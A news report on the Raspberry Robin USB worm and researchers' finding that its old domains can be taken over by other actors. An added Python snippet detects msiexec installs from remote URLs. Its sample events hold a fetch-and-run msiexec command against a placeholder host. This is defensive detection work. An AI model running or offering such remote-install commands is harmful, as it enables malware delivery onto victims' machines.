New Analysis Reveals Raspberry Robin Can be Repurposed by Other Threat Actors
2023-01-11 17:35

A new analysis of Raspberry Robin's attack infrastructure has revealed that it's possible for other threat actors to repurpose the infections for their own malicious activities, making it an even more potent threat.

Raspberry Robin, attributed to a threat actor dubbed DEV-0856, is malware that has increasingly come onto the radar for its use in attacks aimed at finance, government, insurance, and telecom entities.

The attack chain unfolds as follows: when a user inserts the USB drive and launches a Windows shortcut file, the msiexec utility is started, which in turn downloads the main obfuscated Raspberry Robin payload from the QNAP instance.
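
A defender-side check for the msiexec step described above, as an added example that is not part of the original article: it scans process-creation events for msiexec.exe started with an http(s) install source and extracts the remote host and port for pivoting. The event field names and the sample events are constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# http(s) URL inside a command line; case-insensitive so mixed-case
# spellings of the scheme are still caught.
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def find_remote_msiexec(events):
    """Return one finding per remote URL handed to msiexec.exe."""
    findings = []
    for ev in events:
        if basename(ev["image"]) != "msiexec.exe":
            continue
        for url in URL_RE.findall(ev["command_line"]):
            parts = urlsplit(url)
            default_port = 443 if parts.scheme == "https" else 80
            findings.append({
                "host": ev["host"],
                "parent": basename(ev["parent_image"]),
                "remote_host": parts.hostname,
                "remote_port": parts.port or default_port,
            })
    return findings

# Constructed sample events; field names are assumptions modelled on
# typical process-creation telemetry, not taken from the article.
SAMPLE_EVENTS = [
    {"host": "WS01", "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "command_line": "msiexec /q /i hTTp://nas.example.test:8080/pkg"},
    {"host": "WS02", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "command_line": r"msiexec /i C:\Installers\app.msi"},
    {"host": "WS03", "parent_image": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "command_line": r"C:\Windows\System32\msiexec.exe /V"},
    {"host": "WS04", "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\MSIEXEC.EXE",
     "command_line": "msiexec /i https://updates.example.test/agent.msi /qn"},
]

if __name__ == "__main__":
    for finding in find_remote_msiexec(SAMPLE_EVENTS):
        print(finding)
```

Software deployment tools also install MSI packages from URLs, so hits need triage against known-good sources before being treated as an infection.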

"By pointing this domain to our sinkhole, we were able to obtain telemetry from one of the first domains used by Raspberry Robin operators," the company said, adding it observed several victims, indicating "It was still possible to repurpose a Raspberry Robin domain for malicious activities."

Exactly how the first wave of Raspberry Robin USB infections took place remains unknown, although it's suspected that it may have been achieved by relying on other malware to disseminate the worm.

This hypothesis is supported by the presence of a .NET spreader module that's said to be responsible for distributing Raspberry Robin.


News URL

https://thehackernews.com/2023/01/new-analysis-reveals-raspberry-robin.html